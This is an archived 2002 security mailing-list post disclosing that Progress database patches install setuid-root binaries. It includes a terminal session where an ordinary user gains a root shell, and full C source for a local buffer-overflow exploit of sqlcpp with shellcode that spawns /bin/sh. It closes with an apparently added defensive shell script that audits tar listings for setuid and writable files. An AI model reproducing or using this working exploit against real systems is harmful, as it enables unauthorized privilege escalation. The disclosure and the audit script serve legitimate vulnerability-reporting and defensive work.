Progress Setuid patch Installs (Happy Easter or April fools to Progress)

From: KF (dotslashat_private)
Date: Mon Apr 01 2002 - 09:28:55 PST


    http://online.securityfocus.com/archive/82/263602
    
    I sent this out a week or so ago to vuln-dev ... there was never a bid 
    number written up on it so I figured I would stress the problem again. I 
    mailed this to Progress tech support and they failed to respond as usual, 
    so maybe this will get them in gear.
    It's not like I haven't told them how to fix this at least once.
    
    [root@ghetto finished]# ls -al /usr/dlc/bin/sqlcpp
    -rwsrwsr-x    1 root     root      2220918 Oct 23 08:59 /usr/dlc/bin/sqlcpp
    
    Progress likes to include a lot of suids in their patches... and they 
    GIVE them to you even if you don't use the software.
    sqlcpp was NOT part of my install until I patched my box. Thanks for the 
    root security hole guys and STOP using p_stcopy()!
    
    [root@localhost root]# tar tzvf 91C09.tar.Z  | grep ws
    -rwsrwxr-x patchbld/rdl 1001997 2002-02-26 08:16:49 bin/_dbutil
    -rwsrwxr-x patchbld/rdl 1124797 2002-02-26 08:16:51 bin/_mprosrv
    -rwsrwxr-x patchbld/rdl 1540931 2002-02-26 08:16:52 bin/_mprshut
    -rwsrwxr-x patchbld/rdl  413694 2002-02-26 08:16:53 bin/_orasrv
    -rwsrwxr-x patchbld/rdl 4770560 2002-02-26 08:16:56 bin/_proapsv
    -rwsrwxr-x patchbld/rdl  268161 2002-02-26 08:16:57 bin/_probrkr
    -rwsrwxr-x patchbld/rdl 4260172 2002-02-26 08:17:00 bin/_probuild
    -rwsrwxr-x patchbld/rdl 4614600 2002-02-26 08:17:05 bin/_progres
    -rwsrwxr-x patchbld/rdl  311275 2002-02-26 08:17:06 bin/_prooibk
    -rwsrwxr-x patchbld/rdl 2220962 2002-02-26 08:17:08 bin/_prooidv
    -rwsrwxr-x patchbld/rdl 1692954 2002-02-26 08:17:10 bin/_proutil
    -rwsrwxr-x patchbld/rdl 1126861 2002-02-26 08:17:12 bin/_rfutil
    -rwsrwxr-x patchbld/rdl 4580488 2002-02-26 08:17:26 bin/orarx
    -rwsrwxr-x patchbld/rdl 2222278 2002-02-26 08:17:30 bin/sqlcpp
    
    Much thanks to "The Itch" and his great work.
    
    [dotslash@ghetto misc]$ id
    uid=501(dotslash) gid=501(dotslash) groups=501(dotslash)
    [dotslash@ghetto misc]$ cc -o sqlcppx sqlcppx.c
    [dotslash@ghetto misc]$ ./sqlcppx
    /usr/dlc/bin/sqlcpp
    Vulnerability found by KF / http://www.snosoft.com
    Coded by The Itch / http://www.promisc.org
    
    Using return address: 0xbffffae4
    Using buffersize    : 60
    sh-2.05# id
    uid=0(root) gid=501(dotslash) groups=501(dotslash)
    
    -KF
    
    
    
    /*
     * Yet another Progress Database exploit (version ??)
     *
     * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
     * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
     *
     * This exploit was developed on the Snosoft vulnerability research machines
     * mail dotslashat_private if you are interested in contributing research time
     *
     * - The Itch
     * - itchieat_private
     *
     * - Technical details concerning the exploit -
     *
     * 1). Buffer overflow occurs after writing more than 56 bytes into the buffer at the command line
     *     (56 to overwrite ebp, 60 to overwrite eip).
     * 2). If you write more than 65 bytes, other frames will be overwritten afterwards and will mess up
     *     your flow of arbitrary code execution.
     */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>     /* strlen, memcpy */
    #include <unistd.h>     /* execl */
    
    #define DEFAULT_EGG_SIZE 2048
    #define NOP 0x90
    
    #define DEFAULT_BUFFER_SIZE 60
    
    /* Linux/x86: setuid(0) followed by execve("/bin/sh") */
    char shellcode[] =
            "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
            "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    
    int main(int argc, char *argv[])
    {
            char *buff;
            char *egg;
            char *ptr;
            long *addr_ptr;
            int bsize = DEFAULT_BUFFER_SIZE;
            int eggsize = DEFAULT_EGG_SIZE;
            int i;
            /* an address in our own stack frame, used as the return address */
            long get_sp = (long)&get_sp;
    
            if(argc > 1) { bsize = atoi(argv[1]); }
    
            /* bsize rounded up to a whole word, plus a terminating NUL so the
             * argument handed to the target ends exactly where the buffer does */
            if(!(buff = malloc(bsize + sizeof(long) + 1)))
            {
                    printf("unable to allocate memory for %d bytes\n", bsize);
                    exit(1);
            }
    
            if(!(egg = malloc(eggsize)))
            {
                    printf("unable to allocate memory for %d bytes\n", eggsize);
                    exit(1);
            }
    
            printf("/usr/dlc/bin/sqlcpp\n");
            printf("Vulnerability found by KF / http://www.snosoft.com\n");
            printf("Coded by The Itch / http://www.promisc.org\n\n");
            printf("Using return address: 0x%lx\n", get_sp);
            printf("Using buffersize    : %d\n", bsize);
    
            /* fill the command-line argument with copies of the return address */
            ptr = buff;
            addr_ptr = (long *) ptr;
            for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }
            buff[bsize] = '\0';
    
            /* build the egg: NOP sled followed by the shellcode, passed via the environment */
            ptr = egg;
            for(i = 0; i < eggsize - (int)strlen(shellcode) - 1; i++)
            {
                    *(ptr++) = NOP;
            }
    
            for(i = 0; i < (int)strlen(shellcode); i++)
            {
                    *(ptr++) = shellcode[i];
            }
    
            egg[eggsize - 1] = '\0';
            memcpy(egg, "EGG=", 4);
            putenv(egg);
    
            /* path as shown in the ls output above; execl only returns on failure */
            execl("/usr/dlc/bin/sqlcpp", "sqlcpp", buff, (char *)NULL);
            perror("execl");
    
            return 1;
    }
    
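The `tar tzvf ... | grep ws` listing in the post is the check an administrator should run before installing such a patch. As an added example (not KF's code and nothing from Progress), here is a POSIX shell function that reads a `tar -tv` listing on stdin and flags every entry carrying a setuid or setgid bit, additionally tagging those that are group- or world-writable, since anyone in that group could replace the privileged binary; the sample listing is constructed, modelled on the lines in the post.

```shell
#!/bin/sh
# Constructed sample in the format 'tar tv' prints (mode, owner/group, size,
# date, time, path), modelled on the patch listing in the post.
SAMPLE_LISTING='-rwsrwxr-x patchbld/rdl 1001997 2002-02-26 08:16:49 bin/_dbutil
-rwxr-xr-x patchbld/rdl  123456 2002-02-26 08:16:50 bin/pro
-rwsr-xr-x patchbld/rdl 2222278 2002-02-26 08:17:30 bin/sqlcpp
-rwxr-sr-x patchbld/rdl   45678 2002-02-26 08:17:31 bin/_sqlsrv2
-rw-r--r-- patchbld/rdl    1024 2002-02-26 08:17:32 bin/README'

# audit_suid_listing: read a tar -tv listing on stdin and print one line per
# regular file whose mode has the setuid (4th char) or setgid (7th char) bit,
# followed by tags: SETUID, SETGID, and WRITABLE when the group (6th char) or
# world (9th char) write bit is also set on a privileged binary.
audit_suid_listing() {
    while read -r mode owner size date time path; do
        case "$mode" in
            -*) ;;              # regular files only; skip dirs, links, etc.
            *)  continue ;;
        esac
        tags=""
        case "$mode" in ???[sS]*)    tags="$tags SETUID" ;; esac
        case "$mode" in ??????[sS]*) tags="$tags SETGID" ;; esac
        if [ -z "$tags" ]; then
            continue
        fi
        case "$mode" in ?????w*|????????w*) tags="$tags WRITABLE" ;; esac
        printf '%s %s %s%s\n' "$mode" "$owner" "$path" "$tags"
    done
}

# count_flagged: number of entries the audit flags in the listing passed as $1.
count_flagged() {
    printf '%s\n' "$1" | audit_suid_listing | wc -l | tr -d ' '
}

# Usage on a real patch: tar tzvf 91C09.tar.Z | audit_suid_listing
printf '%s\n' "$SAMPLE_LISTING" | audit_suid_listing
```

Run it against the patch archive before extracting it; any setuid entry you did not already have installed deserves to be installed without the bit, or not at all.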



    This archive was generated by hypermail 2b30 : Mon Apr 01 2002 - 13:00:33 PST